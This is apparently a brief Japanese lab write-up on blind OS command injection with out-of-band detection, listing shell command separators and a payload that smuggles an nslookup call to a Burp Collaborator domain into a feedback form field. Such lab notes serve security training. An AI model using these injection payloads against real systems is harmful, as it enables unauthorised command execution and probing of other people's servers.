Hello there, ('ω')ノ
帯域外の相互作用を伴うブラインドOSコマンドインジェクションを。
文字列はコマンドセパレータとして機能して。
コマンドをチェーン化できて。
下記のコマンドセパレータは、WindowsとUnixベースの両方で機能して。
&
&&
|
||
まずは、下記のページからフィードバックを送信して。
対象となるリクエストをリピータへ。
コラボレータを起動して、クリップボードにコピーして。
下記を追加して、指定されたドメインのDNSルックアップを実行すると。
||nslookup+mlbbwwapafyrdggz3k7kcv48izoqcf.burpcollaborator.net||
クリアできた。
攻撃者は、実行された特定の検索を監視して。
コマンドが正常に挿入されたことを検出できて。
Best regards, (^^ゞ